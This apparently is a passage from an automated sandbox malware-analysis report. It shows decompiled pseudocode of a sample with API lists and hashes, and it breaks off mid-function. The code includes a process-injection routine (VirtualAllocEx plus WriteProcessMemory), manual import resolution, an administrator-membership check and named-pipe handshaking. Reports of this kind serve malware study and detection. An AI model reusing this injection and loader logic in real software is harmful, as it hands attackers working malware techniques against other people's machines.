                                                                                                                                  • Instruction ID: 51c4a8f8372388146ce05ee3fd67d3b8acfed2692fca977a8adbfce498b2b585
                                                                                                                                  • Opcode Fuzzy Hash: 72f5f8f4b8a6e38625c08c3a78b0cfce54e590fe4137906a5456ad4f28646144
                                                                                                                                  • Instruction Fuzzy Hash: FB61D271508305ABD7209F51DE0CB6FBBE8FB48345F14482AF945A72D1D7F8D8808BAA
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                  			E0040405E(void* __ecx) {
                                                                                                                                  				unsigned int _v8;
                                                                                                                                  				unsigned int _v12;
                                                                                                                                  				void* _v16;
                                                                                                                                  				void* _v20;
                                                                                                                                  				intOrPtr _v24;
                                                                                                                                  				char _v28;
                                                                                                                                  				intOrPtr _v32;
                                                                                                                                  				char _v40;
                                                                                                                                  				void* _t40;
                                                                                                                                  				void* _t43;
                                                                                                                                  				void* _t49;
                                                                                                                                  				void* _t56;
                                                                                                                                  				void* _t62;
                                                                                                                                  				void* _t64;
                                                                                                                                  				long _t71;
                                                                                                                                  				void* _t82;
                                                                                                                                  				void* _t92;
                                                                                                                                  				void* _t93;
                                                                                                                                  				void* _t95;
                                                                                                                                  				void* _t97;
                                                                                                                                  				void* _t98;
                                                                                                                                  				void* _t99;
                                                                                                                                  				void* _t103;
                                                                                                                                  				void* _t104;
                                                                                                                                  
                                                                                                                                  				_t95 = __ecx;
                                                                                                                                  				_v8 = 0;
                                                                                                                                  				_t40 = CreateEventA(0, 1, 1, 0);
                                                                                                                                  				_v16 = _t40;
                                                                                                                                  				if(_t40 != 0) {
                                                                                                                                  					_t43 = E00404000(E00403ECD(_t95),  &_v20);
                                                                                                                                  					_t97 = _t98;
                                                                                                                                  					_t102 = 0x7d0;
                                                                                                                                  					_t92 = 0x100;
                                                                                                                                  					_t99 = 0x4122f8;
                                                                                                                                  					if(_t43 == 0) {
                                                                                                                                  						L10:
                                                                                                                                  						E0040EE2A(_t97, _t99, 0, _t92);
                                                                                                                                  						_t104 = _t103 + 0xc;
                                                                                                                                  						_t93 = 0xa;
                                                                                                                                  						while(1) {
                                                                                                                                  							_t93 = _t93 - 1;
                                                                                                                                  							_t99 = CreateNamedPipeA(E00403ECD(_t97), 0x40000003, 0, 0xff, 0x64, 0x64, 0x64, 0);
                                                                                                                                  							if(_t99 != 0xffffffff) {
                                                                                                                                  								break;
                                                                                                                                  							}
                                                                                                                                  							Sleep(0x1f4);
                                                                                                                                  							if(_t93 != 0) {
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  							CloseHandle(_v16);
                                                                                                                                  							return 0;
                                                                                                                                  						}
                                                                                                                                  						L14:
                                                                                                                                  						while(1) {
                                                                                                                                  							do {
                                                                                                                                  								L14:
                                                                                                                                  								while(1) {
                                                                                                                                  									do {
                                                                                                                                  										if(ConnectNamedPipe(_t99, 0) != 0) {
                                                                                                                                  											goto L16;
                                                                                                                                  										}
                                                                                                                                  										_t71 = GetLastError();
                                                                                                                                  										asm("sbb eax, eax");
                                                                                                                                  										if( ~(_t71 - 0x217) + 1 == 0) {
                                                                                                                                  											L25:
                                                                                                                                  											DisconnectNamedPipe(_t99);
                                                                                                                                  											continue;
                                                                                                                                  										}
                                                                                                                                  										L16:
                                                                                                                                  										_t49 = E00403F8C(_t99,  &_v12, 4, _v16, _t102);
                                                                                                                                  										_t104 = _t104 + 0x14;
                                                                                                                                  									} while (_t49 == 0);
                                                                                                                                  									_t92 = _v16;
                                                                                                                                  									_v8 = (_v12 >> 2) + _v12;
                                                                                                                                  									E00403F18(_t99,  &_v8, 4, _t92, _t102);
                                                                                                                                  									_t56 = E00403F8C(_t99,  &_v12, 4, _t92, _t102);
                                                                                                                                  									_t104 = _t104 + 0x28;
                                                                                                                                  									if(_t56 == 0 || _v12 != (_v8 >> 2) + _v8) {
                                                                                                                                  										goto L25;
                                                                                                                                  									} else {
                                                                                                                                  										_t62 = E00403F8C(_t99,  &_v28, 8, _t92, _t102);
                                                                                                                                  										_t104 = _t104 + 0x14;
                                                                                                                                  										if(_t62 == 0 || _v24 != 0xc) {
                                                                                                                                  											goto L25;
                                                                                                                                  										} else {
                                                                                                                                  											_t64 = E00403F8C(_t99,  &_v40, 0xc, _t92, _t102);
                                                                                                                                  											_t104 = _t104 + 0x14;
                                                                                                                                  											if(_t64 == 0) {
                                                                                                                                  												goto L25;
                                                                                                                                  											}
                                                                                                                                  											break;
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							} while (_v28 != 1);
                                                                                                                                  							E00403F18(_t99,  &_v8, 4, _t92, _t102);
                                                                                                                                  							_t103 = _t104 + 0x14;
                                                                                                                                  							if(_v32 == 0) {
                                                                                                                                  								_t102 = CloseHandle;
                                                                                                                                  								CloseHandle(_t99);
                                                                                                                                  								CloseHandle(_t92);
                                                                                                                                  								E0040E318();
                                                                                                                                  								L8:
                                                                                                                                  								ExitProcess(0);
                                                                                                                                  							}
                                                                                                                                  							 *0x41215a =  *0x41215a + 1;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					E0040EE2A(_t97, 0x4122f8, 0, 0x100);
                                                                                                                                  					_t103 = _t103 + 0xc;
                                                                                                                                  					if(_v20 == 0xffffffff) {
                                                                                                                                  						goto L10;
                                                                                                                                  					}
                                                                                                                                  					_v12 = E0040ECA5();
                                                                                                                                  					E00403F18(_v20,  &_v12, 4, _v16, 0x7d0);
                                                                                                                                  					_t82 = E00403F8C(_v20,  &_v8, 4, _v16, 0x7d0);
                                                                                                                                  					_t103 = _t103 + 0x28;
                                                                                                                                  					if(_t82 == 0 || _v8 != (_v12 >> 2) + _v12) {
                                                                                                                                  						CloseHandle(_v20);
                                                                                                                                  						goto L10;
                                                                                                                                  					} else {
                                                                                                                                  						_v8 = _v8 + (_v8 >> 2);
                                                                                                                                  						E00403F18(_v20,  &_v8, 4, _v16, 0x7d0);
                                                                                                                                  						_t103 = _t103 + 0x14;
                                                                                                                                  						goto L8;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return 0;
                                                                                                                                  			}
                                                                                                                                  0x0040405e
                                                                                                                                  0x0040406d
                                                                                                                                  0x00404070
                                                                                                                                  0x00404076
                                                                                                                                  0x0040407b
                                                                                                                                  0x00404090
                                                                                                                                  0x00404096
                                                                                                                                  0x00404097
                                                                                                                                  0x0040409c
                                                                                                                                  0x004040a1
                                                                                                                                  0x004040a8
                                                                                                                                  0x00404130
                                                                                                                                  0x00404134
                                                                                                                                  0x00404139
                                                                                                                                  0x0040413e
                                                                                                                                  0x0040413f
                                                                                                                                  0x00404153
                                                                                                                                  0x00404160
                                                                                                                                  0x00404165
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040416c
                                                                                                                                  0x00404174
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00404179
                                                                                                                                  0x00000000
                                                                                                                                  0x00404182
                                                                                                                                  0x00000000
                                                                                                                                  0x00404188
                                                                                                                                  0x00404188
                                                                                                                                  0x00000000
                                                                                                                                  0x00404188
                                                                                                                                  0x00404188
                                                                                                                                  0x00404193
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00404195
                                                                                                                                  0x004041a2
                                                                                                                                  0x004041a5
                                                                                                                                  0x0040425e
                                                                                                                                  0x0040425f
                                                                                                                                  0x00000000
                                                                                                                                  0x0040425f
                                                                                                                                  0x004041ab
                                                                                                                                  0x004041b6
                                                                                                                                  0x004041bb
                                                                                                                                  0x004041be
                                                                                                                                  0x004041c5
                                                                                                                                  0x004041d0
                                                                                                                                  0x004041da
                                                                                                                                  0x004041e8
                                                                                                                                  0x004041ed
                                                                                                                                  0x004041f2
                                                                                                                                  0x00000000
                                                                                                                                  0x00404202
                                                                                                                                  0x0040420b
                                                                                                                                  0x00404210
                                                                                                                                  0x00404215
                                                                                                                                  0x00000000
                                                                                                                                  0x0040421d
                                                                                                                                  0x00404226
                                                                                                                                  0x0040422b
                                                                                                                                  0x00404230
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00404230
                                                                                                                                  0x00404215
                                                                                                                                  0x004041f2
                                                                                                                                  0x00404232
                                                                                                                                  0x00404245
                                                                                                                                  0x0040424a
                                                                                                                                  0x00404251
                                                                                                                                  0x0040426a
                                                                                                                                  0x00404271
                                                                                                                                  0x00404274
                                                                                                                                  0x00404276
                                                                                                                                  0x0040411f
                                                                                                                                  0x00404121
                                                                                                                                  0x00404121
                                                                                                                                  0x00404253
                                                                                                                                  0x00404253
                                                                                                                                  0x00404188
                                                                                                                                  0x004040b2
                                                                                                                                  0x004040b7
                                                                                                                                  0x004040be
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004040c9
                                                                                                                                  0x004040d5
                                                                                                                                  0x004040e7
                                                                                                                                  0x004040ec
                                                                                                                                  0x004040f1
                                                                                                                                  0x0040412a
                                                                                                                                  0x00000000
                                                                                                                                  0x00404101
                                                                                                                                  0x0040410b
                                                                                                                                  0x00404117
                                                                                                                                  0x0040411c
                                                                                                                                  0x00000000
                                                                                                                                  0x0040411c
                                                                                                                                  0x004040f1
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00404070
                                                                                                                                  • ExitProcess.KERNEL32 ref: 00404121
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateEventExitProcess
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 2404124870-2980165447
                                                                                                                                  • Opcode ID: a7245d695b6c108c1b2c14e57ed76f02bf9552f3b235e99bac8c66b9f90f9768
                                                                                                                                  • Instruction ID: 074d9bb49edb1fcb374f0917b5464843becdd4ef2bd88426a03fabb40598a920
                                                                                                                                  • Opcode Fuzzy Hash: a7245d695b6c108c1b2c14e57ed76f02bf9552f3b235e99bac8c66b9f90f9768
                                                                                                                                  • Instruction Fuzzy Hash: 3C5192B1E00209BAEB10ABA19D45FFF7A7CEB54755F00007AFB04B61C1E7798A41C7A9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00406069(_Unknown_base(*)()* _a4) {
                                                                                                                                  				intOrPtr* _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				struct HINSTANCE__* _v16;
                                                                                                                                  				intOrPtr _t47;
                                                                                                                                  				_Unknown_base(*)()* _t48;
                                                                                                                                  				_Unknown_base(*)()* _t50;
                                                                                                                                  				struct HINSTANCE__* _t52;
                                                                                                                                  				_Unknown_base(*)()* _t53;
                                                                                                                                  				_Unknown_base(*)()* _t54;
                                                                                                                                  				_Unknown_base(*)()* _t55;
                                                                                                                                  				signed int _t56;
                                                                                                                                  				_Unknown_base(*)()* _t59;
                                                                                                                                  				_Unknown_base(*)()* _t62;
                                                                                                                                  				_Unknown_base(*)()* _t63;
                                                                                                                                  				intOrPtr _t69;
                                                                                                                                  				_Unknown_base(*)()* _t76;
                                                                                                                                  				_Unknown_base(*)()* _t77;
                                                                                                                                  				intOrPtr* _t82;
                                                                                                                                  				void* _t85;
                                                                                                                                  				intOrPtr* _t87;
                                                                                                                                  				_Unknown_base(*)()* _t89;
                                                                                                                                  
                                                                                                                                  				_t82 = _a4;
                                                                                                                                  				_t47 =  *_t82;
                                                                                                                                  				_t3 = _t82 + 4; // 0x65e85621
                                                                                                                                  				_t69 =  *_t3;
                                                                                                                                  				_v12 = 1;
                                                                                                                                  				if( *((intOrPtr*)(_t47 + 0x84)) != 0) {
                                                                                                                                  					_t85 =  *((intOrPtr*)(_t47 + 0x80)) + _t69;
                                                                                                                                  					_t48 = IsBadReadPtr(_t85, 0x14);
                                                                                                                                  					__eflags = _t48;
                                                                                                                                  					if(_t48 != 0) {
                                                                                                                                  						L29:
                                                                                                                                  						return _v12;
                                                                                                                                  					}
                                                                                                                                  					_t87 = _t85 + 0x10;
                                                                                                                                  					_v8 = _t87;
                                                                                                                                  					while(1) {
                                                                                                                                  						_t50 =  *(_t87 - 4);
                                                                                                                                  						__eflags = _t50;
                                                                                                                                  						if(_t50 == 0) {
                                                                                                                                  							goto L29;
                                                                                                                                  						}
                                                                                                                                  						_t52 = LoadLibraryA(_t50 + _t69);
                                                                                                                                  						_v16 = _t52;
                                                                                                                                  						__eflags = _t52 - 0xffffffff;
                                                                                                                                  						if(_t52 == 0xffffffff) {
                                                                                                                                  							L28:
                                                                                                                                  							_t44 =  &_v12;
                                                                                                                                  							 *_t44 = _v12 & 0x00000000;
                                                                                                                                  							__eflags =  *_t44;
                                                                                                                                  							goto L29;
                                                                                                                                  						}
                                                                                                                                  						_t10 = _t82 + 8; // 0x8bfffffa
                                                                                                                                  						_t53 =  *_t10;
                                                                                                                                  						__eflags = _t53;
                                                                                                                                  						if(_t53 != 0) {
                                                                                                                                  							_t14 = _t82 + 0xc; // 0x28408b06
                                                                                                                                  							_t54 = E0040EBED(_t53, 4 +  *_t14 * 4);
                                                                                                                                  						} else {
                                                                                                                                  							_t11 = _t82 + 0xc; // 0x28408b06
                                                                                                                                  							_t54 = E0040EBCC(4 +  *_t11 * 4);
                                                                                                                                  						}
                                                                                                                                  						 *(_t82 + 8) = _t54;
                                                                                                                                  						__eflags = _t54;
                                                                                                                                  						if(_t54 == 0) {
                                                                                                                                  							goto L28;
                                                                                                                                  						} else {
                                                                                                                                  							_t18 = _t82 + 0xc; // 0x28408b06
                                                                                                                                  							 *((intOrPtr*)(_t54 +  *_t18 * 4)) = _v16;
                                                                                                                                  							 *(_t82 + 0xc) =  *(_t82 + 0xc) + 1;
                                                                                                                                  							_t55 =  *(_t87 - 0x10);
                                                                                                                                  							__eflags = _t55;
                                                                                                                                  							if(_t55 == 0) {
                                                                                                                                  								_t89 =  *_t87 + _t69;
                                                                                                                                  								__eflags = _t89;
                                                                                                                                  								_t76 = _t89;
                                                                                                                                  							} else {
								_t89 = _t55 + _t69;
								_t76 =  *_v8 + _t69;
							}
							_t56 =  *_t89; // first entry of this descriptor's thunk array
							__eflags = _t56;
							if(_t56 == 0) {
								L25:
								__eflags = _v12;
								if(_v12 == 0) {
									goto L29;
								}
								_v8 = _v8 + 0x14; // advance to the next IMAGE_IMPORT_DESCRIPTOR (20 bytes each)
								_t59 = IsBadReadPtr(_v8 + 0xfffffff0, 0x14);
								__eflags = _t59;
								if(_t59 == 0) {
									_t87 = _v8;
									continue;
								}
								goto L29;
							} else {
								_a4 = _t76;
								_a4 = _a4 - _t89; // delta between the IAT and the lookup (name) table
								__eflags = _t56;
								do {
									if(__eflags >= 0) {
										// high bit clear: import by name; +2 skips the Hint WORD of IMAGE_IMPORT_BY_NAME
										_t62 = GetProcAddress(_v16, _t56 + _t69 + 2);
										__eflags = _t62;
										if(_t62 == 0) {
											L21:
											_t63 = _a4;
											__eflags =  *(_t63 + _t89);
											if( *(_t63 + _t89) == 0) {
												_t38 =  &_v12;
												 *_t38 = _v12 & 0x00000000; // unresolved import: clear the "continue" flag
												__eflags =  *_t38;
												goto L25;
											}
											goto L22;
										}
										_t77 = _a4;
										__eflags = _t62 -  *(_t77 + _t89);
										if(_t62 ==  *(_t77 + _t89)) {
											goto L21;
										}
										L20:
										 *(_t77 + _t89) = _t62; // write the resolved address into the IAT slot
										goto L21;
									}
									// high bit set (IMAGE_ORDINAL_FLAG32): import by ordinal, low 16 bits hold the ordinal
									_t62 = GetProcAddress(_v16, _t56 & 0x0000ffff);
									_t77 = _a4;
									goto L20;
									L22:
									_t89 = _t89 + 4; // next 32-bit thunk entry
									_t56 =  *_t89;
									__eflags = _t56;
								} while (__eflags != 0);
								goto L25;
							}
						}
					}
					goto L29;
				}
				return 1;
			}

APIs
• IsBadReadPtr.KERNEL32(?,00000014,00000000,?,00000000,?,004064CF,00000000), ref: 0040609C
• LoadLibraryA.KERNEL32(?,?,004064CF,00000000), ref: 004060C3
• GetProcAddress.KERNEL32(?,00000014), ref: 0040614A
• IsBadReadPtr.KERNEL32(-000000DC,00000014), ref: 0040619E
Memory Dump Source
• Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: Read$AddressLibraryLoadProc
• String ID:
• API String ID: 2438460464-0
• Opcode ID: beeb212f6d5b41c5424ed959fb710d65fbebcae36a96b2ee910fcd89165a7e78
• Instruction ID: 2c66ad34c3d6fb1da92a891872b73c8746f5f3d5bf62d79dfacd6c24df0475f4
• Opcode Fuzzy Hash: beeb212f6d5b41c5424ed959fb710d65fbebcae36a96b2ee910fcd89165a7e78
• Instruction Fuzzy Hash: D5418C71A00105AFDB10CF58C884BAAB7B9EF14354F26807AE816EB3D1D738ED61CB84
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 68%
			E00406EDD() {
				int _v8;
				void* _v12;
				short _v16;
				struct _SID_IDENTIFIER_AUTHORITY _v20;
				signed int _t12;
				int _t15;
				int* _t16;

				_t12 =  *0x412048; // cached result; a negative value means it has not been computed yet
				if(_t12 < 0) {
					// builds SECURITY_NT_AUTHORITY {0,0,0,0,0,5}: _v16 overlays the last two bytes of _v20
					_v20.Value = 0;
					_v16 = 0x500;
					// S-1-5-32-544 (BUILTIN\Administrators): 0x20 = SECURITY_BUILTIN_DOMAIN_RID, 0x220 = DOMAIN_ALIAS_RID_ADMINS
					_t15 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
					_v8 = _t15;
					if(_t15 != 0) {
						_t6 =  &_v8; // 0x40702a
						_t16 = _t6;
						// token handle 0 = the current thread/process token; IsMember result lands in _v8
						__imp__CheckTokenMembership(0, _v12, _t16);
						if(_t16 != 0) {
							 *0x412048 = 0 | _v8 == 0x00000000; // 1 when the token is NOT a member of Administrators
						}
						FreeSid(_v12);
					}
					_t12 =  *0x412048; // 0x0
					if(_t12 != 0) {
						// non-member path; E00406E36 is not shown in this listing
						_t12 = E00406E36(0x12, 0);
						 *0x412048 = _t12;
					}
				}
				return _t12;
			}











APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00406F0F
• CheckTokenMembership.ADVAPI32(00000000,?,*p@), ref: 00406F24
• FreeSid.ADVAPI32(?), ref: 00406F3E
Strings
Memory Dump Source
• Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID: *p@
• API String ID: 3429775523-2474123842
• Opcode ID: e5b07a668181befdfd7487022a30a26c3f8e9f7140bfa863a498fdcbf626812e
• Instruction ID: a55d58a6849641b9de595c9770ce5785232f8714219103e6702645194e06a02f
• Opcode Fuzzy Hash: e5b07a668181befdfd7487022a30a26c3f8e9f7140bfa863a498fdcbf626812e
• Instruction Fuzzy Hash: 6701E571904209AFDB10DFE4ED85AAE7BB8F708304F50847AE606E2191D7745A54CB18
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0040637C(intOrPtr _a4, void* _a8, intOrPtr* _a12, void** _a16) {
				void* _v8;
				void* _t15;
				void* _t16;
				long _t26;
				struct HINSTANCE__* _t32;
				void* _t37;

				if(_a8 != 0) {
					_t32 = GetModuleHandleA(0);
					_t26 =  *( *((intOrPtr*)(_t32 + 0x3c)) + _t32 + 0x50);
					_t15 = VirtualAlloc(0, _t26, 0x1000, 4);
					_v8 = _t15;
					if(_t15 == 0) {
						L5:
						_t16 = 0;
					} else {
						E0040EE08(_t15, _t32, _t26);
						_t37 = VirtualAllocEx(_a8, 0, _t26, 0x1000, 0x40);
						if(_t37 == 0) {
							goto L5;
						} else {
							E004062B7(_v8, _t37);
							if(WriteProcessMemory(_a8, _t37, _v8, _t26, 0) != 0) {
								 *_a16 = _t37;
								 *_a12 = _t37 - _t32 + _a4;
								_t16 = 1;
							} else {
								goto L5;
							}
						}
					}
					return _t16;
				} else {
					return 0;
				}
			}

APIs
• GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,?,?,00409816,?), ref: 0040638F
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,00409816,?), ref: 004063A9
• VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000040), ref: 004063CA
• WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 004063EB
Memory Dump Source
• Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: AllocVirtual$HandleMemoryModuleProcessWrite
• String ID:
• API String ID: 1965334864-0
• Opcode ID: 014909fade78f05395cbd1441a738da6e4bc9fc9854897d694ec9e7df4869719
• Instruction ID: 5c31eb3238d54f8d6ca6dd7d72ba58cabd3ec10295ac0618dae15ec7b9dc1832
• Opcode Fuzzy Hash: 014909fade78f05395cbd1441a738da6e4bc9fc9854897d694ec9e7df4869719
• Instruction Fuzzy Hash: B911A3B1600219BFEB119F65DC49F9B3FA8EB047A4F114035FD09E7290D775DC108AA8
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(00000000), ref: 00AD65F6
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00AD6610
• VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000040), ref: 00AD6631
• WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 00AD6652
Memory Dump Source
• Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: AllocVirtual$HandleMemoryModuleProcessWrite
• String ID:
• API String ID: 1965334864-0
• Opcode ID: f6d5bfc494c97751726a91e8fcfc29ef8439432d9fc6ff92f654e37a29c1b935
• Instruction ID: 875a3a0b4df4ff885560da046a088f97acb83b633a10b032d417b6ab0a04a86a
• Opcode Fuzzy Hash: f6d5bfc494c97751726a91e8fcfc29ef8439432d9fc6ff92f654e37a29c1b935
• Instruction Fuzzy Hash: D3117371600218BFDB219F65ED46F9B3FA8EB057A5F104035F90AE7251D7B1DD4086A4
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%
			E00408E26(void* __ecx, void* __edx, long _a4, void* _a8, long _a12, void* _a16, long _a20, DWORD* _a24) {
				char _v12;
				int _t13;
				DWORD* _t14;
				int _t15;
				void* _t20;
				void* _t23;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t20 = CreateFileW(E00402508(0x4129f8,  &E0041076C, 0xe, 0xec64, 0x7bac), 0xc0000000, 0, 0, 2, 0x80, 0);
				E0040EE2A(_t22, 0x4129f8, 0, 0x200);
				if(_t20 == 0xffffffff) {
					_t13 = 0;
				} else {
					_t23 = _a8;
					if(_t23 == 0) {
						E00408DF1( &_v12);
						_t23 =  &_v12;
						_a12 = 8;
					}
					_t14 = _a24;
					 *_t14 = 0;
					_t15 = DeviceIoControl(_t20, _a4, _t23, _a12, _a16, _a20, _t14, 0);
					CloseHandle(_t20);
					_t13 = _t15;
				}
				return _t13;
			}

                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000100), ref: 00408E5F
                                                                                                                                  • DeviceIoControl.KERNEL32 ref: 00408EAB
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408EB4
                                                                                                                                    • Part of subcall function 00408DF1: GetSystemTime.KERNEL32(?,004129F8,?,?,00408E8B,?), ref: 00408DFC
                                                                                                                                    • Part of subcall function 00408DF1: SystemTimeToFileTime.KERNEL32(?,00408E8B,?,?,00408E8B,?), ref: 00408E0A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$FileSystem$CloseControlCreateDeviceHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3754425949-0
                                                                                                                                  • Opcode ID: 44991cf2ab018bd610f4aaec7180cbecb721f70a429b262d01f00541709b5165
                                                                                                                                  • Instruction ID: 6158522553dbc768b3fa764069f531a078bfca64040c8912efb0c234455cb59d
                                                                                                                                  • Opcode Fuzzy Hash: 44991cf2ab018bd610f4aaec7180cbecb721f70a429b262d01f00541709b5165
                                                                                                                                  • Instruction Fuzzy Hash: CD11C8726402047BEB115F95CD4EEDB3F6DEB85714F00452AF611B62C1DAB9985087A8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E004088B0(intOrPtr _a4) {
                                                                                                                                  				intOrPtr _t98;
                                                                                                                                  				void* _t99;
                                                                                                                                  				intOrPtr _t101;
                                                                                                                                  
                                                                                                                                  				_t101 = _a4;
                                                                                                                                  				E0040EE2A(_t99, _t101, 0, 0x3e0);
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0xc0)) = __imp__#19;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0xc4)) = __imp__#16;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0xc8)) = __imp__#23;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0xcc)) = __imp__#4;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0xd0)) = __imp__#3;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0xd4)) = __imp__#21;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0xd8)) = __imp__#2;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0xdc)) = __imp__#13;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0xe0)) = __imp__#1;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0xe4)) = __imp__#18;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0xe8)) = __imp__#5;
                                                                                                                                  				_t98 = __imp__#6;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x10)) = E00404861;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x14)) = E00405B84;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x18)) = E00404EF2;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 8)) = 0;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0xc)) = 0;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x1c)) = E004038F0;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x20)) = E0040384F;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x134)) = E004035A5;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x24)) = E00408EC5;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x28)) = E00408EFA;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x2c)) = E00408F28;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x30)) = E00408F53;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x34)) = E004022B9;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x38)) = E004025B4;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x3c)) = E00408F87;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x54)) = E0040AD89;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x58)) = E0040B211;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x5c)) = E0040AEDD;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x60)) = E0040F304;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x64)) = E0040F428;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x68)) = E0040F43E;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x6c)) = E0040F483;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x70)) = 0x412104;
                                                                                                                                  				 *((intOrPtr*)(_t101 + 0x74)) = E0040F26D;
